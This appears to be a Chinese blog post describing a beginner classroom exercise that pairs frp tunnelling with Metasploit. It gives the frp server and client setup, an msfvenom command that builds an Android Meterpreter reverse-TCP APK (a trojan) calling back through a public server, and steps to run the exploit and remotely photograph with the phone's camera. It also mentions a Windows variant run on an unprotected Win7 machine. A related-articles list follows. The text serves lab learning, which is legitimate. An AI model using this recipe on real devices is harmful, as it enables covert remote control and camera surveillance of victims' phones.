• 简介

    在实践课上有布置frp内网穿透(内网到公网)和简单的msf木马使用(木马只能内网通信)的任务。此处将两者结合,把木马链接到服务器上,经过内网穿透在本地控制木马。都是入门级实践。

  • 准备

    frp代码下载:https://github.com/fatedier/frp/releases?tdsourcetag=s_pctim_aiomsg
    内网 kali虚拟机
    公网 Ubuntu服务器
    android手机一台

  • 部署frps

    到上述链接下载对应代码到服务器和本地。
    或者使用命令

    wget https://github.com/fatedier/frp/releases/download/v0.21.0/frp_0.21.0_linux_amd64.tar.gz

    解压
    tar -zxvf frp_0.21.0_linux_amd64.tar.gz
    进入目录frp_0.21.0_linux_amd64编辑frps.ini
    vim frps.ini进入编辑,insert键开始编辑,esc键停止编辑,shift+Z+Z保存并退出。
    bind_port是自己设定的frp服务端端口
    vhost_http_port是自己设定的http访问端口。
    执行./frps启动frp服务器端的服务

  • 配置frpc

    客户端的操作与服务器端类似,具体参数不同而已。

    编辑frpc.ini
    server_addr = x.x.x.x #设置公网服务器的ip地址
    server_port = 7000
    local_ip = 127.0.0.1 #设置本地的ip
    local_port = 4444 #内网提供的端口,为后续使用msf,此处监听4444端口
    remote_port = 6000 #公网映射的端口


执行./frpc启动frpc服务
两端服务连接成功的提示

  • 利用msf生成一个简单木马

    msfvenom -p android/meterpreter/reverse_tcp lhost=serverIP lport=4444 R > horse.apk
    lhost指向公网服务器ip
    lport与fpc.ini的remote_port相同
    把测试木马安装在手机上[部分良心厂商会强型拒绝安装,可以放在模拟器里实验]
    进入msfconsole加载攻击模块
    确保frp连接畅通,木马安装并开始运行,输入exploit并回车
    webcam_snap拍摄照片(默认后置摄像头)

    其他命令

  • 补充
    由于是入门级实践,木马的伪装、植入与免杀等高级操作自然在笔者的知识范围外,只能以后再做学习研究。
    实践中即使忽略手机的风险警报安装木马,远程拍摄照片时仍然会被检测到异常,可能会被拦截。
    windows平台上也可做上述实践,只需要把命令中的android换成windows即可,但在win10上会被windows defender一瞬拦截干烂,可用无安全软件的win7虚拟机。

frp内网穿透入门级木马上线实践相关推荐

  1. frp内网穿透教程2022最新(含内网ssh配置与msf联动配置)

    1.frp简介 frp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http,https等协议类型,并且web服务支持根据域名进行路由转发. 1. ...

  2. Centos和Window系统下Frp内网穿透

    frp 是一个高性能的内网穿透的反向代理软件,支持 TCP.UDP.HTTP.HTTPS 等常见协议(TCP最常用),可以将处于局域网或者家用电脑主机.办公电脑主机通过中转服务器的方式暴露在公网里,使 ...

  3. 新手入门 - 详解 frp 内网穿透 frpc.ini 配置

    本文为 Stille 原创文章.经实践,测试,整理发布.如需转载请联系作者获得授权,并注明转载地址. 转载地址:新手入门 - 详解 frp 内网穿透 frpc.ini 配置 - 思有云 - IOIOX ...

  4. frp内网穿透-公网IP低成本使用高性能kali

    frp内网穿透-公网IP低成本使用高性能kali 1.frp Github项目地址:https://github.com/fatedier/frp 找到最新的releases下载,系统版本自行确认. ...

  5. Mac 系统部署Frp内网穿透服务 实现frpc shell启动脚本启动、停止

    Mac 系统部署Frp内网穿透服务 实现frpc shell启动脚本启动.停止 前言 最近疫情导致居家办公,而工作中需要用到公网地址便于调试,于是就在本机(Mac系统)配置了Frpc内网穿透. 本来想 ...

  6. Frp内网穿透——frps服务端部署

    由于现在IPv4地址的短缺,在国内不可能每个设备都会分配到一个公网IP,因此从公网中访问自己的私有设备向来是一件难事儿.本次带大家了解一下frp内网穿透的服务端教学,让你也能够部署一个内网穿透服务. ...

  7. CentOS Frp内网穿透:Frps+Nginx反向代理

    目录 服务器使用配置 一.Nginx安装 二.Frps安装 三.frpc安装 服务器使用配置 CentOS 7.6 CPU: 2核 内存: 4GB 一.Nginx安装 参考<Centos配置Ng ...

  8. 手把手教你用frp内网穿透

    手把手教你用frp做内网穿透 frp 是一个专注于内网穿透的反向代理应用程序,使用时需要花钱申请公网IP和云服务器,可以将内网服务以安全.便捷的方式通过具有公网 IP 节点的中转暴露到公网. 一.认识 ...

  9. frp内网穿透SSH

    参考博客: 博客1(推荐): https://sspai.com/post/52523 博客2: https://blog.csdn.net/qq_36981760/article/details/1 ...

最新文章

  1. 18年石油大学c语言网考答案,石油大学华东C语言2018在线考试.doc
  2. XCTF-Reverse:game(涉及异或脚本编写)
  3. 能不能用一句话总结 HTTPS?
  4. 第二课 运算符(day10)
  5. Vue3.0 Composition API与Vue2.x 使用的 Options API
  6. 常用的Linux关机命令!
  7. 基于云的平台利用新技术来改变商店式购物营销
  8. 高效的JSON处理_ Jackson
  9. 关于MD5对用户密码不进行明文保存的问题
  10. php 数组改成索引数组_PHP:用现有的唯一值替换数组索引键
  11. 9.【Windows】如何制作原版Win10系统盘
  12. 2022-2028年中国数字X射线成像系统行业发展现状调查及市场分析预测报告
  13. Linux普通用户执行root权限脚本且没有读写权限
  14. 融创孙喆一:父辈的光环与阴影下,我反对扮演所谓的二代
  15. 高薪offer,只因做对了这套笔试题
  16. 永恒之蓝 MS17-010漏洞复现
  17. 计算机ctrl加什么作用,ctrl是什么意思 Ctrl键的作用有哪些
  18. threejs加载服务器文件,如何使用Three.js加载obj和mtl文件
  19. cplex小白感悟—前言
  20. python获取ALM数据

热门文章

  1. 常见计算机主机内部硬件设备,计算机的硬件主要包括中央处理器、储存器、输出设备和...
  2. AI 20年内将会给我们的生活带来什么改变?
  3. 美创科技入选第九届CNCERT网络安全应急服务支撑单位
  4. ***.jar!\BOOT-INF\classes!\***.xml没有此文件
  5. [ZT]crontab 调度程序按时执行
  6. geany配置python_python使用Geany编辑器配置方法
  7. 教你用人工智能写文章写歌词写对联
  8. robotframework测试web接口
  9. 双系统 Win10下安装Linux(单/双硬盘)
  10. 微信Android客户端的ANR监控方案